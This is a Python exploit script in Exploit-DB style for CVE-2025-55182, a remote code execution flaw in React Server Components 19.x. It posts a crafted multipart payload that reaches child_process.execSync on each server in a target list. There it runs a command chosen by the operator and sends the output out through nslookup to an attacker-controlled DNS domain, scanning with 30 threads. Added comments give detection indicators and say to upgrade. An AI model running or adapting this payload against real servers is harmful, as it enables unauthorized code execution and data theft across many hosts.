# Exploit Title: React Server 19.2.0 - Remote Code Execution
# Date: 2025-12-05
# Exploit Author: [EynaExp] (https://github.com/EynaExp)
# Vendor Homepage: https://react.dev
# Software Link: https://react.dev/reference/rsc/server-components
# Version: [19.0.0, 19.1.0, 19.1.1, 19.2.0]
# Tested on: Windows,Linux
# CVE : CVE-2025-55182
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed
import argparse
# Silences urllib3's InsecureRequestWarning. That warning is the only runtime
# signal that certificate validation is off: every request sent later in this
# file uses verify=False, so the TLS server identity is never checked.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Color definitions
class Colors:
    """ANSI escape sequences used to colour console output."""

    RED: str = '\033[91m'
    GREEN: str = '\033[92m'
    YELLOW: str = '\033[93m'
    BLUE: str = '\033[94m'
    # Resets all attributes; appended after every coloured span.
    END: str = '\033[0m'
# Static banner shown on start-up, followed by the author's disclaimer.
_BANNER = """
███████╗██╗ ██╗███╗ ██╗ █████╗ ███████╗██╗ ██╗██████╗
██╔════╝╚██╗ ██╔╝████╗ ██║██╔══██╗██╔════╝╚██╗██╔╝██╔══██╗
██║ ╚████╔╝ ██╔██╗ ██║███████║█████╗ ╚███╔╝ ██████╔╝
██║ ╚██╔╝ ██║╚██╗██║██╔══██║██╔══╝ ██╔██╗ ██╔═══╝
╚███████╗ ██║ ██║ ╚████║██║ ██║███████╗██╔╝ ██╗██║
╚══════╝ ╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝
CVE-2025-55182 Proof of Concept
by EynaExp
GitHub: https://github.com/EynaExp
"""
print(_BANNER)
print(Colors.RED + "Disclaimer:\nThis tool is released for EDUCATIONAL and AUTHORIZED TESTING purposes only.\nThe author is not responsible for any misuse or damage caused by this program." + Colors.END)
class NoUsageParser(argparse.ArgumentParser):
    """ArgumentParser variant that reports errors without the usage line.

    argparse's default ``error`` prints usage plus the message to stderr and
    exits with status 2; this override prints only ``Error: <message>`` to
    stdout and exits with status 1.
    """

    def error(self, message):
        print("Error: {}".format(message))
        raise SystemExit(1)
# Command-line interface: three mandatory single-letter switches.
parser = NoUsageParser(description="EynaExp Scanner")
for _flag in ('-d', '-l', '-c'):
    parser.add_argument(_flag, required=True)
# NOTE: the usage text below says [-C] while the registered switch is -c.
print(Colors.GREEN + "\n[+]APP USAGE :\n[-d] <DNS(without http/s)>\n[-l] <Targets file path(url wordlist)>\n[-C] <Command>" + Colors.END + "\n")
args = parser.parse_args()
# Surrounding whitespace is stripped from every value.
dns_endpoint, targets_file_path, CMD = (value.strip() for value in (args.d, args.l, args.c))
# Request headers sent to every target.
# Detection note: the multipart boundary is a fixed constant and the
# "Next-Action" header carries a placeholder value ("x") rather than a real
# action id; both are stable, non-randomized indicators that request-inspection
# rules (WAF, reverse-proxy logging) can match on.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Next-Action": "x",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
}
# Multipart body sent to every target; CMD (-c) and dns_endpoint (-d) come
# from the command line.
# Detection notes:
#  - the body contains the literal strings "child_process" and "execSync",
#    so it is matchable wherever request bodies are inspected in the clear;
#  - command output travels back as a DNS label under dns_endpoint, so the
#    server's resolver / egress DNS logs record the outbound lookup.
# Mitigation: upgrade React to a release that addresses CVE-2025-55182; the
# header comment at the top of this file lists the versions this script targets.
request_body = (
    "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
    "Content-Disposition: form-data; name=\"0\"\r\n\r\n"
    "{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,"
    "\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\","
    "\"_response\":{\"_prefix\":\"process.mainModule.require('child_process').execSync('nslookup `"+CMD+"`."+dns_endpoint+"');\","
    "\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n"
    "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
    "Content-Disposition: form-data; name=\"1\"\r\n\r\n"
    "\"$@0\"\r\n"
    "------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n"
)
def send_request(target_url: str) -> str:
    """POST the module-level ``request_body`` to *target_url* and return a report line.

    Uses the module-level ``headers`` and ``request_body``. Returns a
    colourised summary (HTTP status and response length), extended with one
    extra line for each header from a fixed list that appears in the response.
    Any exception is returned as text instead of raised, so one failing host
    does not abort the thread pool that calls this function.
    """
    try:
        # verify=False: TLS certificates are not validated for this request
        # (the urllib3 warning about this is silenced at the top of the file).
        response = requests.post(target_url, headers=headers, data=request_body, timeout=10, verify=False)
        result_message = f"{Colors.GREEN}[+] {target_url} -> {response.status_code} ({len(response.content)} bytes){Colors.END}"
        # Report which of these response headers, if any, the server returned
        # (header lookup is case-insensitive in requests).
        for header_key in ["x-action", "next-action", "rsc"]:
            if header_key in response.headers:
                result_message += f"\n{Colors.BLUE} header match: {header_key} = {response.headers.get(header_key)}{Colors.END}"
        return result_message
    except Exception as exception:
        # Broad catch: connection errors, timeouts and TLS failures are all
        # reported inline rather than propagated.
        return f"{Colors.RED}[-] {target_url} -> error: {exception}{Colors.END}"
# Load the target list: one URL per line, blank lines skipped.
with open(targets_file_path) as file_handle:
    target_urls = [stripped for stripped in (raw.strip() for raw in file_handle) if stripped]
print(f"{Colors.YELLOW}[*] Loaded {len(target_urls)} targets — starting multi-thread scan...{Colors.END}\n")
# Fan the requests out over 30 worker threads and print each result as soon
# as it finishes (completion order, not input order).
with ThreadPoolExecutor(max_workers=30) as executor:
    futures = [executor.submit(send_request, url) for url in target_urls]
    for done in as_completed(futures):
        print(done.result())